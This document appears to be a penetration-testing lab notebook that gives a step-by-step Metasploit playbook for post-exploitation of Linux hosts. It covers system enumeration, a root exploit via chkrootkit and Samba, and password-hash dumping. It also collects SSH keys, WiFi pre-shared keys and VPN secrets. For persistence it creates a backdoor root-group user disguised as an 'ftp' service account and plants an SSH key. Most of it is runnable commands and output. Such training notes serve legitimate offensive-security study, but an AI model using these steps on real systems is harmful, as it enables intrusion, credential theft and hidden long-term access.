/bin/bash -i
whoami
# Enumerate Users
cat /etc/passwd
groups root
cat /etc/*issue
cat /etc/*release
uname -a
# Network Enumeration
netstat -antp
# if not working
ss -tnl
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 *:445 *:*
LISTEN 0 4096 127.0.0.11:39389 *:*
LISTEN 0 50 *:139 *:*
LISTEN 0 50 :::445 :::*
LISTEN 0 50 :::139 :::*
# List processes
ps aux
# Enumerate environment variables
env
Some Post Exploitation
Enumerate apps and services configuration files
exit
# if the session dies, open a new one
sessions -u 1
search enum_configs
use post/linux/gather/enum_configs
info
# Description:
# This module collects configuration files found on commonly installed
# applications and services, such as Apache, MySQL, Samba, Sendmail,
# etc. If a config file is found in its default path, the module will
# assume that is the file we want.
sessions
# Set the Meterpreter session
set SESSION 4
run
# It will not migrate if it's already a x64 process
loot
# Check the enumerated configuration files
Enumerate system environment variables
search env platform:linux
use post/multi/gather/env
info
# Description:
# This module prints out the operating system environment variables
sessions
set SESSION 3
run
Enumerate network information
search enum_network
use post/linux/gather/enum_network
info
# Description:
# This module gathers network information from the target system
# IPTables rules, interfaces, wireless information, open and listening
# ports, active network connections, DNS information and SSH
# information.
set SESSION 3
run
search enum_protections
use post/linux/gather/enum_protections
info
# Description:
# This module checks whether popular system hardening mechanisms are
# in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also
# tries to find installed applications that can be used to hinder,
# prevent, or detect attacks, such as tripwire, snort, and apparmor.
# This module is meant to identify Linux Secure Modules (LSM) in
# addition to various antivirus, IDS/IPS, firewalls, sandboxes and
# other security related software.
set SESSION 3
run
notes
# check above information stored within the MSFdb
Enumerate the system
search enum_system
use post/linux/gather/enum_system
info
# Description:
# This module gathers system information. We collect installed
# packages, installed services, mount information, user list, user
# bash history and cron jobs
set SESSION 3
run
loot
# Check the installed packages on the O.S.
cat /root/.msf4/loot/20230422105452_Linux_PostExp_192.215.55.3_linux.enum.syste_557868.txt
Check if the target is a VM or a container
search checkcontainer
use post/linux/gather/checkcontainer
# Description:
# This module attempts to determine whether the system is running
# inside of a container and if so, which one. This module supports
# detection of Docker, LXC, and systemd nspawn.
set SESSION 3
run
[+] This appears to be a 'Docker' container
📌 A Docker container can be exploited to break out of it and gain access to the host system.
Enumerate VM
search checkvm
use post/linux/gather/checkvm
set SESSION 3
run
# The target is not a VM
Enumerate users history
search enum_users_history
use post/linux/gather/enum_users_history
# Description:
# This module gathers the following user-specific information: shell
# history, MySQL history, PostgreSQL history, MongoDB history, Vim
# history, lastlog, and sudoers.
set SESSION 3
run
# If this doesn't work, migrate to a "NT AUTHORITY\SYSTEM" user service
loot
cat /root/.msf4/loot/20230422110345_Linux_PostExp_192.215.55.3_linux.enum.users_227379.txt
whoami
cat /etc/passwd
cat /etc/*issue
cat /etc/*release
uname -a
ip a s
netstat -antp
ss -tnl
ps aux
env
Background both the shell and the meterpreter session with CTRL+Z
Privilege Escalation
The technique will depend on the version of the target Linux Kernel and the distribution version.
It is necessary to manually enumerate a privesc vulnerable program, Chkrootkit v.0.49 in this case
search chkrootkit
use exploit/unix/local/chkrootkit
info
# Description:
# Chkrootkit before 0.50 will run any executable file named
# /tmp/update as root, allowing a trivial privilege escalation.
# WfsDelay is set to 24h, since this is how often a chkrootkit scan is
# scheduled by default.
set CHKROOTKIT /bin/chkrootkit
set SESSION 2
set LHOST 192.15.244.2
sessions # check the used ports
run
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Exploitation
search type:exploit name:samba
use exploit/linux/samba/is_known_pipename
options
run
pwd
/tmp
# CTRL + Z to background the shell
sessions
Upgrade the shell cmd/unix sessions to a Meterpreter session
sessions -u 1
sessions 2
getuid
Server username: uid=0, gid=0, euid=0, egid=0
# "root" user Meterpreter session
Linux user account hashes can be dumped using the privileged root user.
Terminate the shell session and background the meterpreter session.
Hashdump
📌 Linux password hashes are stored in the /etc/shadow file, accessible only by a user with root privileges.
In newer Linux, the hashed passwords are stored in the /etc/shadow file. In turn, the hashed password field in the /etc/passwd file is filled with the x character. /etc/passwd is readable by all the users.
Linux users' passphrases are hashed using the crypt function. The hashed passphrase follows a specific format: $id$salt$hashedpassword
post/linux/gather/hashdump module need to be run manually to dump the user account hashes and unshadow them
A hash can be cracked (with John the Ripper) or stored for later use
search hashdump
use post/linux/gather/hashdump
info
# Description:
# Post Module to dump the password hashes for all users on a Linux
# System
set SESSION 2
run
Some Post Exploitation
Enumerate ssh directories
search ssh_creds
use post/multi/gather/ssh_creds
info
# Description:
# This module will collect the contents of all users' .ssh directories
# on the targeted machine. Additionally, known_hosts and
# authorized_keys and any other files are also downloaded. This module
# is largely based on firefox_creds.rb.
sessions
# Set the Meterpreter session
set SESSION 2
run
Enumerate users' .ecrypts directories
search ecryptfs_creds
use post/linux/gather/ecryptfs_creds
info
# Description:
# This module will collect the contents of all users' .ecrypts
# directories on the targeted machine. Collected "wrapped-passphrase"
# files can be cracked with John the Ripper (JtR) to recover "mount
# passphrases".
sessions
set SESSION 2
run
Enumerate WiFi credentials
search enum_psk
use post/linux/gather/enum_psk
info
# Description:
# This module collects 802-11-Wireless-Security credentials such as
# Access-Point name and Pre-Shared-Key from your target CLIENT Linux
# machine using /etc/NetworkManager/system-connections/ files. The
# module gathers NetworkManager's plaintext "psk" information.
set SESSION 2
run
Check for PPTP VPN chap-secrets credentials
search pptpd_chap_secrets
use post/linux/gather/pptpd_chap_secrets
info
# Description:
# This module collects PPTP VPN information such as client, server,
# password, and IP from your target server's chap-secrets file.
set SESSION 2
run
Perform SSH Persistence
search sshkey
use post/linux/manage/sshkey_persistence
info
# Description:
# This module will add an SSH key to a specified user (or all), to
# allow remote login via SSH at any time.
set SESSION 2
run
search ssh_login
use auxiliary/scanner/ssh/ssh_login
options
set USERNAME jackie
set PASSWORD password
run
sessions
Upgrade the shell cmd/unix sessions to a Meterpreter session
sessions -u 1
Privilege Escalation
search chkrootkit
use exploit/unix/local/chkrootkit
set CHKROOTKIT /bin/chkrootkit
set SESSION 2
set LHOST 192.101.97.2
run
# CTRL+Z to background the shell session
Upgrade the privileged session 3 to a Meterpreter session
sessions -u 3
sessions 4
SESSION 4 is a Meterpreter privileged session
Persistence
Create a backdoor user with administrative privileges that can be used to access the target system via SSH
shell
whoami
root
cat /etc/passwd
# Create a user that looks like a service account
# and add it to "root group"
useradd -m ftp -s /bin/bash
passwd ftp
password123
usermod -aG root ftp
usermod -u 15 ftp
groups ftp
ftp : ftp root
❗ Changing user's password is a strong indicator of compromise, it should not be done.
Perform SSH Persistence with a Metasploit persistence modules
exit # CTRL+C
background
search platform:linux persistence
use post/linux/manage/sshkey_persistence
info
# Description:
# This module will add an SSH key to a specified user (or all), to
# allow remote login via SSH at any time.
set SESSION 4
set CREATESSHFOLDER true
run
Access the private key and copy the content of the id_rsa file and save it as a new file. Assign the appropriate permissions to the file
